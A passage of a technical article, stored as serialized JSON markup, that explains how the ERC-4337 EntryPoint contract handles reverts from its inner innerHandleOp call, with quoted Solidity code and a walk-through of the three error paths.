[...]\n",{"type":28,"tag":116,"props":104416,"children":104417},{"class":245,"line":665},[104418,104423],{"type":28,"tag":116,"props":104419,"children":104420},{"style":339},[104421],{"type":33,"value":104422},"        bool",{"type":28,"tag":116,"props":104424,"children":104425},{"style":266},[104426],{"type":33,"value":104427}," success;\n",{"type":28,"tag":116,"props":104429,"children":104430},{"class":245,"line":713},[104431],{"type":28,"tag":116,"props":104432,"children":104433},{"style":266},[104434],{"type":33,"value":31308},{"type":28,"tag":116,"props":104436,"children":104437},{"class":245,"line":750},[104438],{"type":28,"tag":116,"props":104439,"children":104440},{"style":266},[104441],{"type":33,"value":104414},{"type":28,"tag":116,"props":104443,"children":104444},{"class":245,"line":779},[104445,104449,104454,104458],{"type":28,"tag":116,"props":104446,"children":104447},{"style":260},[104448],{"type":33,"value":58419},{"type":28,"tag":116,"props":104450,"children":104451},{"style":266},[104452],{"type":33,"value":104453}," (methodSig ",{"type":28,"tag":116,"props":104455,"children":104456},{"style":370},[104457],{"type":33,"value":2340},{"type":28,"tag":116,"props":104459,"children":104460},{"style":266},[104461],{"type":33,"value":104462}," IAccountExecute.executeUserOp.selector) {\n",{"type":28,"tag":116,"props":104464,"children":104465},{"class":245,"line":796},[104466,104471,104475,104480,104484,104488,104492,104497],{"type":28,"tag":116,"props":104467,"children":104468},{"style":339},[104469],{"type":33,"value":104470},"                bytes",{"type":28,"tag":116,"props":104472,"children":104473},{"style":376},[104474],{"type":33,"value":102694},{"type":28,"tag":116,"props":104476,"children":104477},{"style":266},[104478],{"type":33,"value":104479}," executeUserOp ",{"type":28,"tag":116,"props":104481,"children":104482},{"style":370},[104483],{"type":33,"value":373},{"type":28,"tag":116,"props":104485,"children":104486},{"style":376},[104487],{"type":33,"value":103290},{"type":28,"tag":116,"props":104489,"children":104490},{"style":266},[104491],{"type":33,"value":141},{"type":28,"tag":116,"props":104493,"children":104494},{"style":282},[104495],{"type":33,"value":104496},"encodeCall",{"type":28,"tag":116,"props":104498,"children":104499},{"style":266},[104500],{"type":33,"value":104501},"(IAccountExecute.executeUserOp, (userOp, opInfo.userOpHash));\n",{"type":28,"tag":116,"props":104503,"children":104504},{"class":245,"line":847},[104505,104510,104514,104518,104522,104526,104530,104534],{"type":28,"tag":116,"props":104506,"children":104507},{"style":266},[104508],{"type":33,"value":104509},"                innerCall ",{"type":28,"tag":116,"props":104511,"children":104512},{"style":370},[104513],{"type":33,"value":373},{"type":28,"tag":116,"props":104515,"children":104516},{"style":376},[104517],{"type":33,"value":103290},{"type":28,"tag":116,"props":104519,"children":104520},{"style":266},[104521],{"type":33,"value":141},{"type":28,"tag":116,"props":104523,"children":104524},{"style":282},[104525],{"type":33,"value":104496},{"type":28,"tag":116,"props":104527,"children":104528},{"style":266},[104529],{"type":33,"value":313},{"type":28,"tag":116,"props":104531,"children":104532},{"style":376},[104533],{"type":33,"value":17355},{"type":28,"tag":116,"props":104535,"children":104536},{"style":266},[104537],{"type":33,"value":104538},".innerHandleOp, (executeUserOp, opInfo, context));\n",{"type":28,"tag":116,"props":104540,"children":104541},{"class":245,"line":898},[104542,104546],{"type":28,"tag":116,"props":104543,"children":104544},{"style":266},[104545],{"type":33,"value":70213},{"type":28,"tag":116,"props":104547,"children":104548},{"style":260},[104549],{"type":33,"value":104550},"else\n",{"type":28,"tag":116,"props":104552,"children":104553},{"class":245,"line":907},[104554],{"type":28,"tag":116,"props":104555,"children":104556},{"style":266},[104557],{"type":33,"value":31344},{"type":28,"tag":116,"props":104559,"children":104560},{"class":245,"line":981},[104561,104565,104569,104573,104577,104581,104585,104589],{"type":28,"tag":116,"props":104562,"children":104563},{"style":266},[104564],{"type":33,"value":104509},{"type":28,"tag":116,"props":104566,"children":104567},{"style":370},[104568],{"type":33,"value":373},{"type":28,"tag":116,"props":104570,"children":104571},{"style":376},[104572],{"type":33,"value":103290},{"type":28,"tag":116,"props":104574,"children":104575},{"style":266},[104576],{"type":33,"value":141},{"type":28,"tag":116,"props":104578,"children":104579},{"style":282},[104580],{"type":33,"value":104496},{"type":28,"tag":116,"props":104582,"children":104583},{"style":266},[104584],{"type":33,"value":313},{"type":28,"tag":116,"props":104586,"children":104587},{"style":376},[104588],{"type":33,"value":17355},{"type":28,"tag":116,"props":104590,"children":104591},{"style":266},[104592],{"type":33,"value":104593},".innerHandleOp, (callData, opInfo, context));\n",{"type":28,"tag":116,"props":104595,"children":104596},{"class":245,"line":1011},[104597],{"type":28,"tag":116,"props":104598,"children":104599},{"style":266},[104600],{"type":33,"value":58503},{"type":28,"tag":116,"props":104602,"children":104603},{"class":245,"line":1029},[104604,104609,104613,104618],{"type":28,"tag":116,"props":104605,"children":104606},{"style":282},[104607],{"type":33,"value":104608},"            assembly",{"type":28,"tag":116,"props":104610,"children":104611},{"style":266},[104612],{"type":33,"value":269},{"type":28,"tag":116,"props":104614,"children":104615},{"style":563},[104616],{"type":33,"value":104617},"\"memory-safe\"",{"type":28,"tag":116,"props":104619,"children":104620},{"style":266},[104621],{"type":33,"value":844},{"type":28,"tag":116,"props":104623,"children":104624},{"class":245,"line":1038},[104625,104630,104634,104638,104642,104647,104651,104655,104659,104663,104667,104671,104676,104681,104685,104690,104695,104699,104703,104707],{"type":28,"tag":116,"props":104626,"children":104627},{"style":266},[104628],{"type":33,"value":104629},"                success ",{"type":28,"tag":116,"props":104631,"children":104632},{"style":370},[104633],{"type":33,"value":21270},{"type":28,"tag":116,"props":104635,"children":104636},{"style":282},[104637],{"type":33,"value":40583},{"type":28,"tag":116,"props":104639,"children":104640},{"style":266},[104641],{"type":33,"value":313},{"type":28,"tag":116,"props":104643,"children":104644},{"style":282},[104645],{"type":33,"value":104646},"gas",{"type":28,"tag":116,"props":104648,"children":104649},{"style":266},[104650],{"type":33,"value":18038},{"type":28,"tag":116,"props":104652,"children":104653},{"style":339},[104654],{"type":33,"value":32281},{"type":28,"tag":116,"props":104656,"children":104657},{"style":266},[104658],{"type":33,"value":18038},{"type":28,"tag":116,"props":104660,"children":104661},{"style":350},[104662],{"type":33,"value":353},{"type":28,"tag":116,"props":104664,"children":104665},{"style":266},[104666],{"type":33,"value":825},{"type":28,"tag":116,"props":104668,"children":104669},{"style":282},[104670],{"type":33,"value":9306},{"type":28,"tag":116,"props":104672,"children":104673},{"style":266},[104674],{"type":33,"value":104675},"(innerCall, ",{"type":28,"tag":116,"props":104677,"children":104678},{"style":350},[104679],{"type":33,"value":104680},"0x20",{"type":28,"tag":116,"props":104682,"children":104683},{"style":266},[104684],{"type":33,"value":14840},{"type":28,"tag":116,"props":104686,"children":104687},{"style":282},[104688],{"type":33,"value":104689},"mload",{"type":28,"tag":116,"props":104691,"children":104692},{"style":266},[104693],{"type":33,"value":104694},"(innerCall), ",{"type":28,"tag":116,"props":104696,"children":104697},{"style":350},[104698],{"type":33,"value":353},{"type":28,"tag":116,"props":104700,"children":104701},{"style":266},[104702],{"type":33,"value":825},{"type":28,"tag":116,"props":104704,"children":104705},{"style":350},[104706],{"type":33,"value":59965},{"type":28,"tag":116,"props":104708,"children":104709},{"style":266},[104710],{"type":33,"value":2830},{"type":28,"tag":116,"props":104712,"children":104713},{"class":245,"line":1047},[104714,104719,104723,104728,104732,104736],{"type":28,"tag":116,"props":104715,"children":104716},{"style":266},[104717],{"type":33,"value":104718},"                collected ",{"type":28,"tag":116,"props":104720,"children":104721},{"style":370},[104722],{"type":33,"value":21270},{"type":28,"tag":116,"props":104724,"children":104725},{"style":282},[104726],{"type":33,"value":104727}," mload",{"type":28,"tag":116,"props":104729,"children":104730},{"style":266},[104731],{"type":33,"value":313},{"type":28,"tag":116,"props":104733,"children":104734},{"style":350},[104735],{"type":33,"value":353},{"type":28,"tag":116,"props":104737,"children":104738},{"style":266},[104739],{"type":33,"value":2830},{"type":28,"tag":116,"props":104741,"children":104742},{"class":245,"line":1071},[104743],{"type":28,"tag":116,"props":104744,"children":104745},{"style":266},[104746],{"type":33,"value":58503},{"type":28,"tag":116,"props":104748,"children":104749},{"class":245,"line":1137},[104750,104755],{"type":28,"tag":116,"props":104751,"children":104752},{"style":282},[104753],{"type":33,"value":104754},"            _restoreFreePtr",{"type":28,"tag":116,"props":104756,"children":104757},{"style":266},[104758],{"type":33,"value":104759},"(saveFreePtr);\n",{"type":28,"tag":116,"props":104761,"children":104762},{"class":245,"line":1181},[104763],{"type":28,"tag":116,"props":104764,"children":104765},{"style":266},[104766],{"type":33,"value":1954},{"type":28,"tag":116,"props":104768,"children":104769},{"class":245,"line":1212},[104770,104774,104778,104782],{"type":28,"tag":116,"props":104771,"children":104772},{"style":260},[104773],{"type":33,"value":2943},{"type":28,"tag":116,"props":104775,"children":104776},{"style":266},[104777],{"type":33,"value":269},{"type":28,"tag":116,"props":104779,"children":104780},{"style":370},[104781],{"type":33,"value":20285},{"type":28,"tag":116,"props":104783,"children":104784},{"style":266},[104785],{"type":33,"value":104786},"success) {\n",{"type":28,"tag":116,"props":104788,"children":104789},{"class":245,"line":1254},[104790],{"type":28,"tag":116,"props":104791,"children":104792},{"style":266},[104793],{"type":33,"value":104414},{"type":28,"tag":116,"props":104795,"children":104796},{"class":245,"line":1262},[104797,104801,104806,104810],{"type":28,"tag":116,"props":104798,"children":104799},{"style":260},[104800],{"type":33,"value":58419},{"type":28,"tag":116,"props":104802,"children":104803},{"style":266},[104804],{"type":33,"value":104805}," (innerRevertCode ",{"type":28,"tag":116,"props":104807,"children":104808},{"style":370},[104809],{"type":33,"value":2340},{"type":28,"tag":116,"props":104811,"children":104812},{"style":266},[104813],{"type":33,"value":104814}," INNER_OUT_OF_GAS) {\n",{"type":28,"tag":116,"props":104816,"children":104817},{"class":245,"line":1294},[104818],{"type":28,"tag":116,"props":104819,"children":104820},{"style":250},[104821],{"type":33,"value":104822},"                // handleOps was called with gas limit too low. abort entire bundle.\n",{"type":28,"tag":116,"props":104824,"children":104825},{"class":245,"line":1334},[104826],{"type":28,"tag":116,"props":104827,"children":104828},{"style":250},[104829],{"type":33,"value":104830},"                // can only be caused by bundler (leaving not enough gas for inner call)\n",{"type":28,"tag":116,"props":104832,"children":104833},{"class":245,"line":1372},[104834,104839,104844,104849,104854],{"type":28,"tag":116,"props":104835,"children":104836},{"style":260},[104837],{"type":33,"value":104838},"                revert",{"type":28,"tag":116,"props":104840,"children":104841},{"style":282},[104842],{"type":33,"value":104843}," FailedOp",{"type":28,"tag":116,"props":104845,"children":104846},{"style":266},[104847],{"type":33,"value":104848},"(opIndex, ",{"type":28,"tag":116,"props":104850,"children":104851},{"style":563},[104852],{"type":33,"value":104853},"\"AA95 out of gas\"",{"type":28,"tag":116,"props":104855,"children":104856},{"style":266},[104857],{"type":33,"value":895},{"type":28,"tag":116,"props":104859,"children":104860},{"class":245,"line":1381},[104861,104865,104869,104873,104877,104881],{"type":28,"tag":116,"props":104862,"children":104863},{"style":266},[104864],{"type":33,"value":70213},{"type":28,"tag":116,"props":104866,"children":104867},{"style":260},[104868],{"type":33,"value":2986},{"type":28,"tag":116,"props":104870,"children":104871},{"style":260},[104872],{"type":33,"value":15449},{"type":28,"tag":116,"props":104874,"children":104875},{"style":266},[104876],{"type":33,"value":104805},{"type":28,"tag":116,"props":104878,"children":104879},{"style":370},[104880],{"type":33,"value":2340},{"type":28,"tag":116,"props":104882,"children":104883},{"style":266},[104884],{"type":33,"value":104885}," INNER_REVERT_LOW_PREFUND) {\n",{"type":28,"tag":116,"props":104887,"children":104888},{"class":245,"line":1389},[104889],{"type":28,"tag":116,"props":104890,"children":104891},{"style":250},[104892],{"type":33,"value":104893},"                // innerCall reverted on prefund too low. treat entire prefund as \"gas cost\"\n",{"type":28,"tag":116,"props":104895,"children":104896},{"class":245,"line":1425},[104897,104901,104906,104910,104915,104919,104924,104928,104932],{"type":28,"tag":116,"props":104898,"children":104899},{"style":339},[104900],{"type":33,"value":103074},{"type":28,"tag":116,"props":104902,"children":104903},{"style":266},[104904],{"type":33,"value":104905}," actualGas ",{"type":28,"tag":116,"props":104907,"children":104908},{"style":370},[104909],{"type":33,"value":373},{"type":28,"tag":116,"props":104911,"children":104912},{"style":266},[104913],{"type":33,"value":104914}," preGas ",{"type":28,"tag":116,"props":104916,"children":104917},{"style":370},[104918],{"type":33,"value":3996},{"type":28,"tag":116,"props":104920,"children":104921},{"style":376},[104922],{"type":33,"value":104923}," gasleft",{"type":28,"tag":116,"props":104925,"children":104926},{"style":266},[104927],{"type":33,"value":13709},{"type":28,"tag":116,"props":104929,"children":104930},{"style":370},[104931],{"type":33,"value":2268},{"type":28,"tag":116,"props":104933,"children":104934},{"style":266},[104935],{"type":33,"value":104936}," opInfo.preOpGas;\n",{"type":28,"tag":116,"props":104938,"children":104939},{"class":245,"line":1448},[104940,104944,104948,104952],{"type":28,"tag":116,"props":104941,"children":104942},{"style":339},[104943],{"type":33,"value":103074},{"type":28,"tag":116,"props":104945,"children":104946},{"style":266},[104947],{"type":33,"value":103720},{"type":28,"tag":116,"props":104949,"children":104950},{"style":370},[104951],{"type":33,"value":373},{"type":28,"tag":116,"props":104953,"children":104954},{"style":266},[104955],{"type":33,"value":104956}," opInfo.prefund;\n",{"type":28,"tag":116,"props":104958,"children":104959},{"class":245,"line":1456},[104960,104965],{"type":28,"tag":116,"props":104961,"children":104962},{"style":282},[104963],{"type":33,"value":104964},"                _emitPrefundTooLow",{"type":28,"tag":116,"props":104966,"children":104967},{"style":266},[104968],{"type":33,"value":104969},"(opInfo);\n",{"type":28,"tag":116,"props":104971,"children":104972},{"class":245,"line":1520},[104973,104978,104983,104987],{"type":28,"tag":116,"props":104974,"children":104975},{"style":282},[104976],{"type":33,"value":104977},"                _emitUserOperationEvent",{"type":28,"tag":116,"props":104979,"children":104980},{"style":266},[104981],{"type":33,"value":104982},"(opInfo, ",{"type":28,"tag":116,"props":104984,"children":104985},{"style":376},[104986],{"type":33,"value":7847},{"type":28,"tag":116,"props":104988,"children":104989},{"style":266},[104990],{"type":33,"value":104991},", actualGasCost, actualGas);\n",{"type":28,"tag":116,"props":104993,"children":104994},{"class":245,"line":1580},[104995,104999,105003],{"type":28,"tag":116,"props":104996,"children":104997},{"style":266},[104998],{"type":33,"value":104718},{"type":28,"tag":116,"props":105000,"children":105001},{"style":370},[105002],{"type":33,"value":373},{"type":28,"tag":116,"props":105004,"children":105005},{"style":266},[105006],{"type":33,"value":105007}," actualGasCost;\n",{"type":28,"tag":116,"props":105009,"children":105010},{"class":245,"line":1620},[105011,105015,105019],{"type":28,"tag":116,"props":105012,"children":105013},{"style":266},[105014],{"type":33,"value":70213},{"type":28,"tag":116,"props":105016,"children":105017},{"style":260},[105018],{"type":33,"value":2986},{"type":28,"tag":116,"props":105020,"children":105021},{"style":266},[105022],{"type":33,"value":1291},{"type":28,"tag":116,"props":105024,"children":105025},{"class":245,"line":1668},[105026],{"type":28,"tag":116,"props":105027,"children":105028},{"style":266},[105029],{"type":33,"value":104414},{"type":28,"tag":116,"props":105031,"children":105032},{"class":245,"line":1677},[105033,105037,105041,105046],{"type":28,"tag":116,"props":105034,"children":105035},{"style":266},[105036],{"type":33,"value":104718},{"type":28,"tag":116,"props":105038,"children":105039},{"style":370},[105040],{"type":33,"value":373},{"type":28,"tag":116,"props":105042,"children":105043},{"style":282},[105044],{"type":33,"value":105045}," _postExecution",{"type":28,"tag":116,"props":105047,"children":105048},{"style":266},[105049],{"type":33,"value":3133},{"type":28,"tag":116,"props":105051,"children":105052},{"class":245,"line":1685},[105053],{"type":28,"tag":116,"props":105054,"children":105055},{"style":266},[105056],{"type":33,"value":105057},"                    IPaymaster.PostOpMode.postOpReverted,\n",{"type":28,"tag":116,"props":105059,"children":105060},{"class":245,"line":1729},[105061],{"type":28,"tag":116,"props":105062,"children":105063},{"style":266},[105064],{"type":33,"value":105065},"                    opInfo,\n",{"type":28,"tag":116,"props":105067,"children":105068},{"class":245,"line":1764},[105069],{"type":28,"tag":116,"props":105070,"children":105071},{"style":266},[105072],{"type":33,"value":105073},"                    context,\n",{"type":28,"tag":116,"props":105075,"children":105076},{"class":245,"line":1896},[105077],{"type":28,"tag":116,"props":105078,"children":105079},{"style":266},[105080],{"type":33,"value":105081},"                    actualGas\n",{"type":28,"tag":116,"props":105083,"children":105084},{"class":245,"line":1932},[105085],{"type":28,"tag":116,"props":105086,"children":105087},{"style":266},[105088],{"type":33,"value":105089},"                );\n",{"type":28,"tag":116,"props":105091,"children":105092},{"class":245,"line":1940},[105093],{"type":28,"tag":116,"props":105094,"children":105095},{"style":266},[105096],{"type":33,"value":58503},{"type":28,"tag":116,"props":105098,"children":105099},{"class":245,"line":1948},[105100],{"type":28,"tag":116,"props":105101,"children":105102},{"style":266},[105103],{"type":33,"value":1954},{"type":28,"tag":116,"props":105105,"children":105106},{"class":245,"line":1957},[105107],{"type":28,"tag":116,"props":105108,"children":105109},{"style":266},[105110],{"type":33,"value":3025},{"type":28,"tag":29,"props":105112,"children":105113},{},[105114,105116,105121,105123,105129,105131,105137,105139,105145],{"type":33,"value":105115},"During execution, the ",{"type":28,"tag":98,"props":105117,"children":105119},{"className":105118},[],[105120],{"type":33,"value":101877},{"type":33,"value":105122}," contract makes a ",{"type":28,"tag":87,"props":105124,"children":105127},{"href":105125,"rel":105126},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L222-L232",[91],[105128],{"type":33,"value":37918},{"type":33,"value":105130}," to its own ",{"type":28,"tag":98,"props":105132,"children":105134},{"className":105133},[],[105135],{"type":33,"value":105136},"innerHandleOp",{"type":33,"value":105138}," function through a low-level ",{"type":28,"tag":98,"props":105140,"children":105142},{"className":105141},[],[105143],{"type":33,"value":105144},"call()",{"type":33,"value":105146},". This is done to create a new call context for executing the user operation.",{"type":28,"tag":29,"props":105148,"children":105149},{},[105150,105152,105158,105159,105164,105166,105173,105175,105181],{"type":33,"value":105151},"If this call fails (when ",{"type":28,"tag":98,"props":105153,"children":105155},{"className":105154},[],[105156],{"type":33,"value":105157},"success",{"type":33,"value":5172},{"type":28,"tag":98,"props":105160,"children":105162},{"className":105161},[],[105163],{"type":33,"value":7847},{"type":33,"value":105165},"), the code enters an ",{"type":28,"tag":87,"props":105167,"children":105170},{"href":105168,"rel":105169},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L235-L273",[91],[105171],{"type":33,"value":105172},"error handling",{"type":33,"value":105174}," flow that checks the ",{"type":28,"tag":98,"props":105176,"children":105178},{"className":105177},[],[105179],{"type":33,"value":105180},"innerRevertCode",{"type":33,"value":105182},". There are three possible paths:",{"type":28,"tag":455,"props":105184,"children":105185},{},[105186,105210,105228],{"type":28,"tag":459,"props":105187,"children":105188},{},[105189,105190,105195,105196,105202,105204,105209],{"type":33,"value":7151},{"type":28,"tag":98,"props":105191,"children":105193},{"className":105192},[],[105194],{"type":33,"value":105180},{"type":33,"value":5172},{"type":28,"tag":98,"props":105197,"children":105199},{"className":105198},[],[105200],{"type":33,"value":105201},"INNER_OUT_OF_GAS",{"type":33,"value":105203},", it means the bundler didn't provide enough gas for execution. This causes the entire bundle to fail with ",{"type":28,"tag":98,"props":105205,"children":105207},{"className":105206},[],[105208],{"type":33,"value":104853},{"type":33,"value":141},{"type":28,"tag":459,"props":105211,"children":105212},{},[105213,105214,105219,105220,105226],{"type":33,"value":7151},{"type":28,"tag":98,"props":105215,"children":105217},{"className":105216},[],[105218],{"type":33,"value":105180},{"type":33,"value":5172},{"type":28,"tag":98,"props":105221,"children":105223},{"className":105222},[],[105224],{"type":33,"value":105225},"INNER_REVERT_LOW_PREFUND",{"type":33,"value":105227},", it means the user didn't prefund enough gas. In this case, it charges the entire prefund amount as gas cost.",{"type":28,"tag":459,"props":105229,"children":105230},{},[105231,105233,105239,105241,105247],{"type":33,"value":105232},"For any other revert reason, the code will still call ",{"type":28,"tag":98,"props":105234,"children":105236},{"className":105235},[],[105237],{"type":33,"value":105238},"_postExecution()",{"type":33,"value":105240}," but with ",{"type":28,"tag":98,"props":105242,"children":105244},{"className":105243},[],[105245],{"type":33,"value":105246},"PostOpMode.postOpReverted",{"type":33,"value":105248},". This ensures proper cleanup happens even on failure.",{"type":28,"tag":29,"props":105250,"children":105251},{},[105252,105254,105259,105261,105266,105268,105273,105275,105280],{"type":33,"value":105253},"We're particularly interested in the third error path, where ",{"type":28,"tag":98,"props":105255,"children":105257},{"className":105256},[],[105258],{"type":33,"value":105180},{"type":33,"value":105260}," is neither ",{"type":28,"tag":98,"props":105262,"children":105264},{"className":105263},[],[105265],{"type":33,"value":105201},{"type":33,"value":105267}," nor ",{"type":28,"tag":98,"props":105269,"children":105271},{"className":105270},[],[105272],{"type":33,"value":105225},{"type":33,"value":105274},". To understand this case better, let's examine how ",{"type":28,"tag":98,"props":105276,"children":105278},{"className":105277},[],[105279],{"type":33,"value":105136},{"type":33,"value":105281}," works.",{"type":28,"tag":234,"props":105283,"children":105285},{"className":4143,"code":105284,"language":4142,"meta":7,"style":7},"    function innerHandleOp(\n        bytes memory callData,\n        UserOpInfo memory opInfo,\n        bytes calldata context\n    ) external returns (uint256 actualGasCost) {\n    [...]\n        IPaymaster.PostOpMode mode = IPaymaster.PostOpMode.opSucceeded;\n        if (callData.length > 0) {\n            bool success = Exec.call(mUserOp.sender, 0, callData, callGasLimit);\n            if (!success) {\n                uint256 freePtr = _getFreePtr();\n                bytes memory result = Exec.getReturnData(REVERT_REASON_MAX_LEN);\n                if (result.length > 0) {\n                    emit UserOperationRevertReason(\n                        opInfo.userOpHash,\n                        mUserOp.sender,\n                        mUserOp.nonce,\n                        result\n                    );\n                }\n                _restoreFreePtr(freePtr);\n                mode = IPaymaster.PostOpMode.opReverted;\n            }\n        }\n\n        unchecked {\n            uint256 actualGas = preGas - gasleft() + opInfo.preOpGas;\n            return _postExecution(mode, opInfo, context, actualGas);\n        }\n    }\n",[105286],{"type":28,"tag":98,"props":105287,"children":105288},{"__ignoreMap":7},[105289,105305,105326,105346,105362,105395,105402,105419,105443,105483,105502,105527,105561,105585,105602,105610,105618,105626,105634,105642,105649,105662,105679,105686,105693,105700,105711,105750,105766,105773],{"type":28,"tag":116,"props":105290,"children":105291},{"class":245,"line":246},[105292,105296,105301],{"type":28,"tag":116,"props":105293,"children":105294},{"style":376},[105295],{"type":33,"value":89449},{"type":28,"tag":116,"props":105297,"children":105298},{"style":282},[105299],{"type":33,"value":105300}," innerHandleOp",{"type":28,"tag":116,"props":105302,"children":105303},{"style":266},[105304],{"type":33,"value":3133},{"type":28,"tag":116,"props":105306,"children":105307},{"class":245,"line":256},[105308,105313,105317,105322],{"type":28,"tag":116,"props":105309,"children":105310},{"style":339},[105311],{"type":33,"value":105312},"        bytes",{"type":28,"tag":116,"props":105314,"children":105315},{"style":376},[105316],{"type":33,"value":102694},{"type":28,"tag":116,"props":105318,"children":105319},{"style":272},[105320],{"type":33,"value":105321}," callData",{"type":28,"tag":116,"props":105323,"children":105324},{"style":266},[105325],{"type":33,"value":3178},{"type":28,"tag":116,"props":105327,"children":105328},{"class":245,"line":293},[105329,105333,105337,105342],{"type":28,"tag":116,"props":105330,"children":105331},{"style":376},[105332],{"type":33,"value":104353},{"type":28,"tag":116,"props":105334,"children":105335},{"style":376},[105336],{"type":33,"value":102694},{"type":28,"tag":116,"props":105338,"children":105339},{"style":272},[105340],{"type":33,"value":105341}," opInfo",{"type":28,"tag":116,"props":105343,"children":105344},{"style":266},[105345],{"type":33,"value":3178},{"type":28,"tag":116,"props":105347,"children":105348},{"class":245,"line":361},[105349,105353,105357],{"type":28,"tag":116,"props":105350,"children":105351},{"style":339},[105352],{"type":33,"value":105312},{"type":28,"tag":116,"props":105354,"children":105355},{"style":376},[105356],{"type":33,"value":102626},{"type":28,"tag":116,"props":105358,"children":105359},{"style":272},[105360],{"type":33,"value":105361}," context\n",{"type":28,"tag":116,"props":105363,"children":105364},{"class":245,"line":387},[105365,105370,105375,105379,105383,105387,105391],{"type":28,"tag":116,"props":105366,"children":105367},{"style":266},[105368],{"type":33,"value":105369},"    ) ",{"type":28,"tag":116,"props":105371,"children":105372},{"style":376},[105373],{"type":33,"value":105374},"external",{"type":28,"tag":116,"props":105376,"children":105377},{"style":260},[105378],{"type":33,"value":75613},{"type":28,"tag":116,"props":105380,"children":105381},{"style":266},[105382],{"type":33,"value":269},{"type":28,"tag":116,"props":105384,"children":105385},{"style":339},[105386],{"type":33,"value":45793},{"type":28,"tag":116,"props":105388,"children":105389},{"style":272},[105390],{"type":33,"value":103434},{"type":28,"tag":116,"props":105392,"children":105393},{"style":266},[105394],{"type":33,"value":844},{"type":28,"tag":116,"props":105396,"children":105397},{"class":245,"line":400},[105398],{"type":28,"tag":116,"props":105399,"children":105400},{"style":266},[105401],{"type":33,"value":104414},{"type":28,"tag":116,"props":105403,"children":105404},{"class":245,"line":614},[105405,105410,105414],{"type":28,"tag":116,"props":105406,"children":105407},{"style":266},[105408],{"type":33,"value":105409},"        IPaymaster.PostOpMode mode ",{"type":28,"tag":116,"props":105411,"children":105412},{"style":370},[105413],{"type":33,"value":373},{"type":28,"tag":116,"props":105415,"children":105416},{"style":266},[105417],{"type":33,"value":105418}," IPaymaster.PostOpMode.opSucceeded;\n",{"type":28,"tag":116,"props":105420,"children":105421},{"class":245,"line":631},[105422,105426,105431,105435,105439],{"type":28,"tag":116,"props":105423,"children":105424},{"style":260},[105425],{"type":33,"value":2943},{"type":28,"tag":116,"props":105427,"children":105428},{"style":266},[105429],{"type":33,"value":105430}," (callData.length ",{"type":28,"tag":116,"props":105432,"children":105433},{"style":370},[105434],{"type":33,"value":645},{"type":28,"tag":116,"props":105436,"children":105437},{"style":350},[105438],{"type":33,"value":2718},{"type":28,"tag":116,"props":105440,"children":105441},{"style":266},[105442],{"type":33,"value":844},{"type":28,"tag":116,"props":105444,"children":105445},{"class":245,"line":665},[105446,105451,105456,105460,105465,105469,105474,105478],{"type":28,"tag":116,"props":105447,"children":105448},{"style":339},[105449],{"type":33,"value":105450},"            bool",{"type":28,"tag":116,"props":105452,"children":105453},{"style":266},[105454],{"type":33,"value":105455}," success ",{"type":28,"tag":116,"props":105457,"children":105458},{"style":370},[105459],{"type":33,"value":373},{"type":28,"tag":116,"props":105461,"children":105462},{"style":266},[105463],{"type":33,"value":105464}," Exec.",{"type":28,"tag":116,"props":105466,"children":105467},{"style":282},[105468],{"type":33,"value":37918},{"type":28,"tag":116,"props":105470,"children":105471},{"style":266},[105472],{"type":33,"value":105473},"(mUserOp.sender, ",{"type":28,"tag":116,"props":105475,"children":105476},{"style":350},[105477],{"type":33,"value":353},{"type":28,"tag":116,"props":105479,"children":105480},{"style":266},[105481],{"type":33,"value":105482},", callData, callGasLimit);\n",{"type":28,"tag":116,"props":105484,"children":105485},{"class":245,"line":713},[105486,105490,105494,105498],{"type":28,"tag":116,"props":105487,"children":105488},{"style":260},[105489],{"type":33,"value":58419},{"type":28,"tag":116,"props":105491,"children":105492},{"style":266},[105493],{"type":33,"value":269},{"type":28,"tag":116,"props":105495,"children":105496},{"style":370},[105497],{"type":33,"value":20285},{"type":28,"tag":116,"props":105499,"children":105500},{"style":266},[105501],{"type":33,"value":104786},{"type":28,"tag":116,"props":105503,"children":105504},{"class":245,"line":750},[105505,105509,105514,105518,105523],{"type":28,"tag":116,"props":105506,"children":105507},{"style":339},[105508],{"type":33,"value":103074},{"type":28,"tag":116,"props":105510,"children":105511},{"style":266},[105512],{"type":33,"value":105513}," freePtr ",{"type":28,"tag":116,"props":105515,"children":105516},{"style":370},[105517],{"type":33,"value":373},{"type":28,"tag":116,"props":105519,"children":105520},{"style":282},[105521],{"type":33,"value":105522}," _getFreePtr",{"type":28,"tag":116,"props":105524,"children":105525},{"style":266},[105526],{"type":33,"value":1445},{"type":28,"tag":116,"props":105528,"children":105529},{"class":245,"line":779},[105530,105534,105538,105543,105547,105551,105556],{"type":28,"tag":116,"props":105531,"children":105532},{"style":339},[105533],{"type":33,"value":104470},{"type":28,"tag":116,"props":105535,"children":105536},{"style":376},[105537],{"type":33,"value":102694},{"type":28,"tag":116,"props":105539,"children":105540},{"style":266},[105541],{"type":33,"value":105542}," result ",{"type":28,"tag":116,"props":105544,"children":105545},{"style":370},[105546],{"type":33,"value":373},{"type":28,"tag":116,"props":105548,"children":105549},{"style":266},[105550],{"type":33,"value":105464},{"type":28,"tag":116,"props":105552,"children":105553},{"style":282},[105554],{"type":33,"value":105555},"getReturnData",{"type":28,"tag":116,"props":105557,"children":105558},{"style":266},[105559],{"type":33,"value":105560},"(REVERT_REASON_MAX_LEN);\n",{"type":28,"tag":116,"props":105562,"children":105563},{"class":245,"line":796},[105564,105568,105573,105577,105581],{"type":28,"tag":116,"props":105565,"children":105566},{"style":260},[105567],{"type":33,"value":103133},{"type":28,"tag":116,"props":105569,"children":105570},{"style":266},[105571],{"type":33,"value":105572}," (result.length ",{"type":28,"tag":116,"props":105574,"children":105575},{"style":370},[105576],{"type":33,"value":645},{"type":28,"tag":116,"props":105578,"children":105579},{"style":350},[105580],{"type":33,"value":2718},{"type":28,"tag":116,"props":105582,"children":105583},{"style":266},[105584],{"type":33,"value":844},{"type":28,"tag":116,"props":105586,"children":105587},{"class":245,"line":847},[105588,105593,105598],{"type":28,"tag":116,"props":105589,"children":105590},{"style":260},[105591],{"type":33,"value":105592},"                    emit",{"type":28,"tag":116,"props":105594,"children":105595},{"style":282},[105596],{"type":33,"value":105597}," UserOperationRevertReason",{"type":28,"tag":116,"props":105599,"children":105600},{"style":266},[105601],{"type":33,"value":3133},{"type":28,"tag":116,"props":105603,"children":105604},{"class":245,"line":898},[105605],{"type":28,"tag":116,"props":105606,"children":105607},{"style":266},[105608],{"type":33,"value":105609},"                        